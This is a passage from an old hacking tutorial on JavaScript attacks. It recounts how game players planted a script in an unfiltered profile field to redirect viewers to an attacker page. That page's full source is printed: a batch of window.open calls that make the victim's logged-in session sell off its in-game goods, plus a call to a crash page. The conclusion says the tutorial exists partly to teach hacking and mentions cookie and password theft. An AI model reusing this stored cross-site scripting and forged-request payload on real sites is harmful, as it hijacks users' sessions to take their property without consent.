The page that it prints to is their player profile page. Which other players have to view before they can attack them. This script doesn't filter for < or > so they decided to try something =) They inputted <script type=text/javascript> window.open('http://www.cisconinja.net/a.php'); </script> - don't visit that url... so whenever anyone wantted to attack them they got sent to http://www.cisconinja.net/a.php here is the source to that page:

<h1> FUCK YOU </h1>
%lt;script laguage="javascript">
window.open('http://members.redlite.org/game/forms/form_sell.php?sell_aks=10000');
window.open('http://www.redlite.org/game/forms/form_sell.php?sell_aks=10000');
window.open('http://members.redlite.org/game/market/bm_sell.php?qty=10000&item=3');
window.open('http://www.redlite.org/game/market/bm_sell.php?qty=5000&item=4');
window.open('http://members.redlite.org/game/market/bm_sell.php?qty=5000&item=4');
window.open('http://www.redlite.org/game/market/bm_sell.php?qty=10000&item=3');
window.open('http://members.redlite.org/game/forms/form_sell.php?sell_aks=5000');
window.open('http://www.redlite.org/game/forms/form_sell.php?sell_aks=5000');
window.open('http://members.redlite.org/game/market/bm_sell.php?qty=5000&item=3');
window.open('http://www.redlite.org/game/market/bm_sell.php?qty=5000&item=3');
window.open('http://www.redlite.org/game/market/bm_sell.php?qty=5000&item=4');
window.open('http://members.redlite.org/game/market/bm_sell.php?qty=5000&item=4');
window.open('http://www.cisconinja.net/crash.php');
</script>

This will open a bunch of windows and sells all the user's stuff.. so they are defensless against your attack. The crash.php will crash them, so you have time to attack them and get all the money that they just got from selling all their stuff. HAHA, works out good doesn't it? Normally you couldn't just send a user to a url and expect them to sell things, since you need to be logged into the game to do that. But the only way for enemies to view your profile is if they are logged in.

This story should have helpped you see how just being in the right frame of mind and knowing what you can do with the programing language can lead to some fun hacking. The b0g kids found an exploit and got it to work to cheat in a game. Now if that happend on a bank's server there could have been some trouble.

I'll get some more here in a bit, there was one nice cookie stealing story I heard about a few years ago that I would really like to find out exactly what happend. If I do I'll add that here =)

9. Conclusion

Well, this tutorial was partly written to teach people how to hack, and partly written to show all those people who say javascript can't be used to hack that it can. Although you won't really gain access to a box with javascript you can trick users or steal passwords which might lead to your comprising the system. I haven't really seen any other tutorial written on using javascript to hack, so I decided to give it a go.

I would really like to thank a few people who helped me with javascript and gave me some ideas along the way. Intruder, acecww, l8nite, shoelessguy, #javacript on dalnet, #html on dalnet, a few bugtraq postings, and http://www.guninski.com/ - a really cool site with tons of example of how javascript can be used to hack. This guy is pretty much the inventor of javascript hacking. I do not claim that I found all of these exploits, most of them I got from bugtraq and from friends. There are of course many other ways to use javascript to aid a hacker, many are too limited or too strange to explain in this tutorial.

One last thing I would suggest is that you pick up these two programs: one is called a program called Achilles which is a proxy that allows you to mess with the http requests. Another great program is Proxomitron, which lets you edit webpages, http headers, and a whole bunch of other goodies. This means you can add javascript into webpages and see how it will react. I used this program in another tut I wrote, Hacking Angelfire . I hope you found this paper unique and interesting. If you have any other javascript tricks feel free to email me (b0iler@hotmail.com) with them. Also any comments or error corrections are welcome. And remember to check out all the other killer tutorials over at http://b0iler.eyeonsecurity.net/

[-----]
http://b0iler.eyeonsecurity.net/ - is my homepage

I got tonss of tutorials, advisories, and mini-tutorials written by me there.
I also plan on hooking up with some friends to do a project were we all throw
our tutorials together and form a site. When I update this tutorial I will
include the url.
[-----]

[-----]
http://b0iler.eyeonsecurity.net/ - A really good site with tons of orignal tutorials.
[-----]